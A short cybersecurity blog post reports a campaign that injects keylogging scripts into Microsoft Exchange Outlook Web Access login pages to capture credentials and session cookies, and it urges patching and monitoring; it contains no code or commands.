Cyber Blog

A sophisticated cyberattack campaign is targeting Microsoft Exchange servers by quietly injecting malicious code into their login pages. By modifying the Outlook Web Access (OWA) interface, attackers can secretly log every keystroke users enter—including usernames and passwords—as they attempt to sign in.

This method doesn’t rely on phishing emails or fake websites. Instead, it manipulates the actual Exchange login page, making it nearly impossible for users to detect that anything is wrong. The attackers have crafted two versions of their keylogger script. One stores the stolen credentials in a hidden file on the server, while the other instantly transmits the data to an external destination for real-time harvesting.

So far, dozens of Exchange servers have been compromised across a wide range of countries. The scope is global, impacting organizations in sectors such as government, banking, IT, education, logistics, and industrial services. Initial activity appears to have focused on regions in the Middle East and Africa before expanding to a much broader range of targets.

The hackers are exploiting long-known vulnerabilities in Microsoft Exchange, including flaws that were first disclosed several years ago. These weaknesses allow attackers to gain administrative access, after which they can modify the OWA login page and embed their data-capturing code without disrupting normal functionality.

What makes this campaign particularly dangerous is how quietly it operates. In some versions of the attack, the stolen data is stored locally, requiring no outbound traffic at all—making detection incredibly difficult for traditional security tools. In other versions, the data is smuggled out through common internet traffic patterns that are hard to distinguish from legitimate activity.

In addition to usernames and passwords, the scripts also gather other valuable details like session cookies, browser information, and timestamps. This gives attackers not only the ability to log in as the user but also the tools to impersonate them more convincingly in future attacks.

This campaign is a wake-up call for organizations still relying on outdated or unpatched Exchange servers. Despite the availability of fixes for many of the exploited vulnerabilities, too many systems remain exposed. The use of such stealthy and effective techniques to steal login credentials highlights the importance of proactive security practices.

Organizations should take immediate steps to ensure their Exchange servers are fully patched, limit unnecessary internet exposure, and carefully inspect login pages and authentication logs for signs of tampering. In today’s threat landscape, even trusted systems can become traps if they’re not actively maintained and monitored.